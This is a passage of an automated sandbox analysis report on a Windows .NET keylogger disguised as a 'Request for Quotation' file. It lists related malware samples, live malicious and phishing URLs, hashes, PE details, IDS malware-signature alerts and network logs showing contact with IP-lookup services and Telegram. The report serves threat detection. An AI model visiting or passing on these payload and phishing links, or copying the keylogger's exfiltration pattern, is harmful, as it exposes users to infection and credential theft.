                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: Request for Quotation Plug Valve.exe
                                                                TimeTypeDescription
                                                                09:10:15API Interceptor11213750x Sleep call for process: Request for Quotation Plug Valve.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.2203g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        JFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                                                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                            SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                                              NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    188.114.96.3QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • filetransfer.io/data-package/fOmsJ2bL/download
                                                                                    NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.thetahostthe.top/9r5x/
                                                                                    RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                                                    74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                    • kuechenundmehr.com/x.htm
                                                                                    PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.cc101.pro/ttiz/
                                                                                    http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • revexhibition.pages.dev/favicon.ico
                                                                                    http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                                                    • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                    http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                                    • www.tkmall-wholesale.com/
                                                                                    c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                                    • winfileshare.com/ticket_line/llb.php
                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                                                    193.122.130.0tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.org3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    s-part-0017.t-0009.t-msedge.netSgqO4P37cK.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.107.246.45
                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                    • 13.107.246.45
                                                                                    frik.exeGet hashmaliciousXmrigBrowse
                                                                                    • 13.107.246.45
                                                                                    Windows Defender.exeGet hashmaliciousXWormBrowse
                                                                                    • 13.107.246.45
                                                                                    Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.246.45
                                                                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.246.45
                                                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                    • 13.107.246.45
                                                                                    Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                    • 13.107.246.45
                                                                                    po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.246.45
                                                                                    20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                    • 13.107.246.45
                                                                                    us2.smtp.mailhostbox.comCotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.91.198.143
                                                                                    ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.225
                                                                                    Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.224
                                                                                    Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.223
                                                                                    SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.225
                                                                                    z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.198.143
                                                                                    z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.223
                                                                                    PAYSLIP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.224
                                                                                    SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.224
                                                                                    SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 208.91.199.223
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRU3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                    • 149.154.167.99
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    JFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                                                                                    • 149.154.167.220
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    CLOUDFLARENETUS3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                    • 104.21.53.8
                                                                                    vD6qU34v9S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.12.205
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.11.31
                                                                                    tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    ORACLE-BMC-31898US3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                    • 152.67.146.77
                                                                                    SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                    • 152.67.146.77
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    PO.L0009316.Pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9ad3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    3b5074b1b5d032e5620f69f9f700ff0e3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    vD6qU34v9S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    http://cdn.prod.website-files.com/66006200351a0e5dfaa727ed/66de69bda1d04790a2e6ba98_54204894406.pdfGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    eshkere.batGet hashmaliciousXmrigBrowse
                                                                                    • 149.154.167.220
                                                                                    No context
                                                                                    Process:C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1216
                                                                                    Entropy (8bit):5.34331486778365
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                    Malicious:true
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.772258315664058
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:Request for Quotation Plug Valve.exe
                                                                                    File size:776'704 bytes
                                                                                    MD5:fa1c425a44a073cec7f36210a6d7c3e6
                                                                                    SHA1:70f4f24c7d4dd4bddfe2fa711f73d8c952be7d5b
                                                                                    SHA256:181b41addb05b81a4246bc0dfe801d408c7478322cca039b66e91fd0d37c4f47
                                                                                    SHA512:7ce12e5589dccfe59885f76f86ff32d882ed34d3e021bf9e20d77a4983045d82edf119f28d4d4231ecb656cfbfc497697fef3e56449819eaeada848ca38507db
                                                                                    SSDEEP:12288:3Zx8GLOzb9CIwIlp9d/BVCVkdIjMHTloR2vC5fJ+OowgFovmE:Jy5b9+c/nC2dc3R2vsJTgF5E
                                                                                    TLSH:CFF402A8125DD413C95127780972F1B816BA8EDE7802DB81EEDD7CFFBAA6F005C84197
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..g..............0.............>.... ........@.. .......................@............`................................
                                                                                    Icon Hash:00928e8e8686b000
                                                                                    Entrypoint:0x4bf13e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6704B42F [Tue Oct 8 04:25:19 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbf0ec0x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x364.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xbd1440xbd2002fa4c2a6159a986c77b4835471e1aeecFalse0.9061209104428288data7.779225466224072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xc00000x3640x400bdda334372afdee3c5ecabe8a8a8729cFalse0.365234375data2.752045168177255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xc20000xc0x200bc703825e4cc9853dd63a54e61ace295False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0xc00580x308data0.44458762886597936
                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-08T15:10:20.736990+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649737193.122.130.080TCP
                                                                                    2024-10-08T15:10:21.752732+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649737193.122.130.080TCP
                                                                                    2024-10-08T15:10:22.337547+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649761188.114.96.3443TCP
                                                                                    2024-10-08T15:10:22.861976+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649765193.122.130.080TCP
                                                                                    2024-10-08T15:10:23.435351+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649769188.114.96.3443TCP
                                                                                    2024-10-08T15:10:32.163088+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649831188.114.96.3443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 8, 2024 15:10:17.919924021 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:17.924979925 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:17.925057888 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:17.925327063 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:17.930288076 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.556535959 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.556983948 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.557005882 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.557048082 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:20.557100058 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:20.589606047 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:20.594814062 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.693608999 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.736989975 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:20.785516024 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:20.785553932 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.785628080 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:20.825026035 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:20.825042963 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.307502031 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.307631969 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.318243027 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.318264008 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.318622112 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.361999035 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.428895950 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.471409082 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.559928894 CEST44349752188.114.96.3192.168.2.6
